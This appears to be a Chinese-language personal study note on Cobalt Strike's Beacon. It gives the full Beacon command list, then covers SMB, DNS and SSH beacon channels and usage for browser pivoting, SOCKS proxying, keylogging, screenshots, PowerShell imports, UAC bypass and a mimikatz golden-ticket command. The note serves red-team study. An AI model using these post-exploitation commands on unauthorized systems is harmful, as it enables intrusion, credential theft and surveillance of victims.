最近還是重新補一下cs的東西
0x01 Beacon命令
Beacon Commands =============== Command Description ------- ----------- argue Spoof arguments for matching processes blockdlls Block non-Microsoft DLLs in child processes browserpivot Setup a browser pivot session bypassuac Spawn a session in a high integrity process cancel Cancel a download that's in-progress cd Change directory checkin Call home and post data clear Clear beacon queue connect Connect to a Beacon peer over TCP covertvpn Deploy Covert VPN client cp Copy a file dcsync Extract a password hash from a DC desktop View and interact with target's desktop dllinject Inject a Reflective DLL into a process dllload Load DLL into a process with LoadLibrary() download Download a file downloads Lists file downloads in progress drives List drives on target elevate Try to elevate privileges execute Execute a program on target (no output) execute-assembly Execute a local .NET program in-memory on target exit Terminate the beacon session getprivs Enable system privileges on current token getsystem Attempt to get SYSTEM getuid Get User ID hashdump Dump password hashes help Help menu inject Spawn a session in a specific process jobkill Kill a long-running post-exploitation task jobs List long-running post-exploitation tasks kerberos_ccache_use Apply kerberos ticket from cache to this session kerberos_ticket_purge Purge kerberos tickets from this session kerberos_ticket_use Apply kerberos ticket to this session keylogger Inject a keystroke logger into a process kill Kill a process link Connect to a Beacon peer over a named pipe logonpasswords Dump credentials and hashes with mimikatz ls List files make_token Create a token to pass credentials mimikatz Runs a mimikatz command mkdir Make a directory mode dns Use DNS A as data channel (DNS beacon only) mode dns-txt Use DNS TXT as data channel (DNS beacon only) mode dns6 Use DNS AAAA as data channel (DNS beacon only) mode http Use HTTP as data channel mv Move a file net Network and host enumeration tool note Assign a note to this Beacon portscan Scan a network for open services powerpick Execute a command via Unmanaged PowerShell powershell Execute a command via powershell.exe powershell-import Import a powershell script ppid Set parent PID for spawned post-ex jobs ps Show process list psexec Use a service to spawn a session on a host psexec_psh Use PowerShell to spawn a session on a host psinject Execute PowerShell command in specific process pth Pass-the-hash using Mimikatz pwd Print current directory reg Query the registry rev2self Revert to original token rm Remove a file or folder rportfwd Setup a reverse port forward run Execute a program on target (returns output) runas Execute a program as another user runasadmin Execute a program in a high-integrity context runu Execute a program under another PID screenshot Take a screenshot setenv Set an environment variable shell Execute a command via cmd.exe shinject Inject shellcode into a process shspawn Spawn process and inject shellcode into it sleep Set beacon sleep time socks Start SOCKS4a server to relay traffic socks stop Stop SOCKS4a server spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh Use SSH to spawn an SSH session on a host ssh-key Use SSH to spawn an SSH session on a host steal_token Steal access token from a process timestomp Apply timestamps from one file to another unlink Disconnect from parent Beacon upload Upload a file wdigest Dump plaintext credentials with mimikatz winrm Use WinRM to spawn a session on a host wmi Use WMI to spawn a session on a host
Command Description ------- ----------- browserpivot 注入受害者瀏覽器進程 bypassuac 繞過UAC cancel 取消正在進行的下載 cd 切換目錄 checkin 強制讓被控端回連一次 clear 清除beacon內部的任務隊列 connect Connect to a Beacon peer over TCP covertvpn 部署Covert VPN客戶端 cp 復制文件 dcsync 從DC中提取密碼哈希 desktop 遠程VNC dllinject 反射DLL注入進程 dllload 使用LoadLibrary將DLL加載到進程中 download 下載文件 downloads 列出正在進行的文件下載 drives 列出目標盤符 elevate 嘗試提權 execute 在目標上執行程序(無輸出) execute-assembly 在目標上內存中執行本地.NET程序 exit 退出beacon getprivs Enable system privileges on current token getsystem 嘗試獲取SYSTEM權限 getuid 獲取用戶ID hashdump 轉儲密碼哈希值 help 幫助 inject 在特定進程中生成會話 jobkill 殺死一個后台任務 jobs 列出后台任務 kerberos_ccache_use 從ccache文件中導入票據應用於此會話 kerberos_ticket_purge 清除當前會話的票據 kerberos_ticket_use 從ticket文件中導入票據應用於此會話 keylogger 鍵盤記錄 kill 結束進程 link Connect to a Beacon peer over a named pipe logonpasswords 使用mimikatz轉儲憑據和哈希值 ls 列出文件 make_token 創建令牌以傳遞憑據 mimikatz 運行mimikatz mkdir 創建一個目錄 mode dns 使用DNS A作為通信通道(僅限DNS beacon) mode dns-txt 使用DNS TXT作為通信通道(僅限D beacon) mode dns6 使用DNS AAAA作為通信通道(僅限DNS beacon) mode http 使用HTTP作為通信通道 mv 移動文件 net net命令 note 備注 portscan 進行端口掃描 powerpick 通過Unmanaged PowerShell執行命令 powershell 通過powershell.exe執行命令 powershell-import 導入powershell腳本 ppid Set parent PID for spawned post-ex jobs ps 顯示進程列表 p**ec Use a service to spawn a session on a host p**ec_psh Use PowerShell to spawn a session on a host psinject 在特定進程中執行PowerShell命令 pth 使用Mimikatz進行傳遞哈希 pwd 當前目錄位置 reg Query the registry rev2self 恢復原始令牌 rm 刪除文件或文件夾 rportfwd 端口轉發 run 在目標上執行程序(返回輸出) runas 以另一個用戶權限執行程序 runasadmin 在高權限下執行程序 runu Execute a program under another PID screenshot 屏幕截圖 setenv 設置環境變量 shell cmd執行命令 shinject 將shellcode注入進程 shspawn 生成進程並將shellcode注入其中 sleep 設置睡眠延遲時間 socks 啟動SOCKS4代理 socks stop 停止SOCKS4 spawn Spawn a session spawnas Spawn a session as another user spawnto Set executable to spawn processes into spawnu Spawn a session under another PID ssh 使用ssh連接遠程主機 ssh-key 使用密鑰連接遠程主機 steal_token 從進程中竊取令牌 timestomp 將一個文件時間戳應用到另一個文件 unlink Disconnect from parent Beacon upload 上傳文件 wdigest 使用mimikatz轉儲明文憑據 winrm 使用WinRM在主機上生成會話 wmi 使用WMI在主機上生成會話 argue 進程參數欺騙
interact來使用Beacon
Beacon可以選擇通過DNS還是HTTP協議出口網絡,你甚至可以在使用Beacon通訊過程中切換HTTP和DNS。
為了能快速顯示結果,可以設置 beacon>sleep 0
0x02 常用beacon隧道
tcp beacon
SMB beacon
摘官網的介紹:
SMB Beacon使用命名管道通過父級Beacon進行通訊,當兩個Beacons鏈接后,子Beacon從父Beacon獲取到任務並發送。
因為鏈接的Beacons使用Windows命名管道進行通信,此流量封裝在SMB協議中,所以SMB Beacon相對隱蔽,繞防火牆時可能發揮奇效。
SMB Beacon的主機必須接受端口445上的連接
spawn as>選中對應的Listener>上線
或在beacon中使用命令spawn listenername
這就是派生的SMB Beacon。
當前是連接狀態,Beacon上用link <ip>命令鏈接或者unlink <ip>命令斷開它
DNS Beacon
DNS Beacon 在繞過防火牆 權限維持上非常有效
關於DNS上線的域名配置:
A記錄指向服務器ip -->ns記錄都指向A記錄域名
ns 記錄
SSH beacon
內網爆破ssh機器也許會有收獲,直接點cs馬即可~
兩種SSH Beacon連接方法
1.密碼直接連接
Beacon命令:
ssh [target:port] [user] [pass]
2.ssh密匙連接
ssh [target:port] [user] [/path/to/key.pem]
鏈接成功后,會出現一個子beacon上線。
0x03 常用命令
Browserpivot
注入受害者瀏覽器進程,然后開啟HTTP代理
ps/tasklist 找到瀏覽器進程id 例如:
注入進程:
beacon> browserpivot 1580
注入瀏覽器進程成功之后,會顯示: Browser Pivot HTTP proxy is at: xxx.xxx.xxx.xxx:端口號
然后就可以設置本地HTTP瀏覽器代理
當然當被攻擊者關閉瀏覽器的時候,代理也就失效了,關閉此代理可使用如下命令:browserpivot stop
Socks
開啟socks4a代理,代理進行內網滲透測試
beacon>socks 端口
socks 啟動SOCKS4代理
socks stop 停止SOCKS4
然后我們可以配置代理工具,例如proxychains.conf,添加: socks4 127.0.0.1 9999
Screenshot
截取受害者一定時間的屏幕截圖,操作命令為:
或者: beacon>screenshot
然后打開View->Screenshots,則可以看到屏幕截圖
4)Keylogger鍵盤記錄器
View->Keystrokes,則可以看到鍵盤記錄結果
powershell-import
導入各種powershell滲透框架,比如nishang的powerpreter,直接執行:
beacon> powershell-import
或者直接執行:
powershell-import [/path/to/local/script.ps1]
要執行某模塊直接使用如下命令,比如
beacon> powershell xxx-xxx
kerberos
共有三個模塊
也就是域中常用的手段 普通票據、金銀票據傳遞攻擊
kerberos_ccache_use 從cache文件中導入票據
kerberos_ticket_purge 清除當前會話的票據
kerberos_ticket_use 從ticket文件中導入票據
使用mimikatz:
kerberos::golden /admin:USER /domain:DOMAIN /sid:SID /krbtgt:HASH /ticket:FILE
BypassUAC
直接執行:
beacon> bypassuac
